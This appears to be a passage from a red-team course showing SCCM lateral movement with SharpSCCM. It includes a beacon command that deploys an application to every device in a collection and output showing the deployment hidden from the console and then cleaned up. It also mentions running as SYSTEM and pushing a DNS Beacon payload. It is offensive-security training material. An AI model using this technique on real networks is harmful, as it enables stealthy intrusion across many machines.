With Full or Application Administrator privileges over a device or a collection, we can deploy scripts or applications to aid in lateral movement. To execute a command on every device in the DEV collection, we could do exec -n DEV -p <path>.
SharpSCCM attempts to hide the application (i.e. the command we're executing) from the GUI, but the deployment is still visible until it completes.
By default, the above will execute Notepad as the user currently logged into each machine. If a user is not logged in, then the command won't execute. We can force it to execute as SYSTEM using the -s parameter, and this will execute on every machine regardless of whether a user is currently logged in or not. As with the GPO Abuse chapter, we can upload and execute a DNS Beacon payload.
beacon> execute-assembly C:\Tools\SharpSCCM\bin\Release\SharpSCCM.exe exec -n DEV -p C:\Windows\notepad.exe --no-banner
[+] Creating new application: Application_4b981c0c-ccc4-4971-b6cc-ff774770be5c
[+] Application path: C:\Windows\notepad.exe
[+] Updated application to hide it from the Configuration Manager console
[+] Updated application to run in the context of the logged on user
[+] Successfully created application
[+] Creating new deployment of Application_4b981c0c-ccc4-4971-b6cc-ff774770be5c to DEV (S0100014)
[+] Found the Application_4b981c0c-ccc4-4971-b6cc-ff774770be5c application
[+] Successfully created deployment of Application_4b981c0c-ccc4-4971-b6cc-ff774770be5c to DEV (S0100014)
[+] New deployment name: Application_4b981c0c-ccc4-4971-b6cc-ff774770be5c_S0100014_Install
[+] Waiting for new deployment to become available...
[+] New deployment is available, waiting 30 seconds for updated policy to become available
[+] Forcing all members of DEV (S0100014) to retrieve machine policy and execute any new applications available
[+] Waiting 1 minute for execution to complete...
[+] Cleaning up
[+] Found the Application_4b981c0c-ccc4-4971-b6cc-ff774770be5c_S0100014_Install deployment
[+] Deleted the Application_4b981c0c-ccc4-4971-b6cc-ff774770be5c_S0100014_Install deployment
[+] Querying for deployments of Application_4b981c0c-ccc4-4971-b6cc-ff774770be5c_S0100014_Install
[+] No remaining deployments named Application_4b981c0c-ccc4-4971-b6cc-ff774770be5c_S0100014_Install were found
[+] Found the Application_4b981c0c-ccc4-4971-b6cc-ff774770be5c application
[+] Deleted the Application_4b981c0c-ccc4-4971-b6cc-ff774770be5c application
[+] Querying for applications named Application_4b981c0c-ccc4-4971-b6cc-ff774770be5c
[+] No remaining applications named Application_4b981c0c-ccc4-4971-b6cc-ff774770be5c were found
[+] Completed execution in 00:02:18.2210387
